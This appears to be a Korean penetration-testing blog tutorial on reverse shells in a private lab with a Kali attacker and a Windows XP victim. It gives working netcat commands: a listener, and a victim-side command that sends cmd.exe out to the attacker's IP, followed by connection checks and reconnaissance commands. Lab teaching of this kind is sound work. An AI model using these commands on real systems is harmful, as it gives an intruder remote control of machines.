실습> reverse shell 이해하기
reverse shell은 reverse connection 을 기반으로 Attacker에서 포트를 열고 대기하고 있다가
Victim이 Attacker로 접속할 때 쉘을 가지고 나가면 연결 후에 Victim의 쉘이 실행되는 공격 형태이다.
Attacker(Kali) : 192.168.108.102
Victim(Windows XP) : 192.168.108.105
윈도우 버전
Attacker Victim
+----------+ | +----------+
| | | | |
| | | | -p |
| 8000 <----------|----- 1068 [cmd.exe] -e
| | | | |
| | | | |
+----------+ | +----------+
192.168.108.102 192.168.108.100
firewall.cpl 활성화
reverse shell의 조건 :
- Victim에 방화벽이 활성화(Inbound 쪽) 되어 있어도 상관없다.
- Victim에 방화벽이 Outbound 쪽도 설정되어 있다면 연결이 안될 수 있다.
- Victim에 방화벽이 있다면 Attacker에서 포트를 열었기 때문에 Attacker로 접속할 수 있는 상황이 된다.
- Victim이 Attacker로 연결할 때 쉘(/bin/sh)을 가지고 나가야 한다.
1. Victim 방화벽 활성화
방화벽의 Inbound 쪽의 방화벽 룰을 설정한다.
설정 방법 : cmd -> firewall.cpl -> 사용으로 체크를 한다.
2. Attacker 포트 오픈
Attacker# nc -lvp 8000
3. Victim 에서 접속
nc.exe를 실행하면 nc -d 192.168.108.102 8000 -e cmd.exe 와 동일하다.
Cmd line: -d 192.168.108.102 8000 -e cmd.exe
4. 포트 확인
Victim# netstat -na | findstr 8000
TCP 192.168.108.105:1068 192.168.108.102:8000 ESTABLISHED
Attacker# netstat -natp | grep 8000
tcp 0 0 192.168.108.102:8000 192.168.108.105:1068 ESTABLISHED 38530/nc
5. 명령어 사용
Attacker# nc -lvp 8000
C:\Documents and Settings\ksw\바탕 화면>
ipconfig
net user
'Linux > 모의해킹' 카테고리의 다른 글
| putty 실행파일 패치 (0) | 2022.01.03 |
|---|---|
| Windows XP 에서 msfvenom 공격 (0) | 2022.01.03 |
| Windows XP 에서 Bind Shell 이해하기 (0) | 2022.01.03 |
| msfconsole 공격 기법 (0) | 2022.01.03 |
| Metasploit 옵션 (#msfconsole) (0) | 2022.01.03 |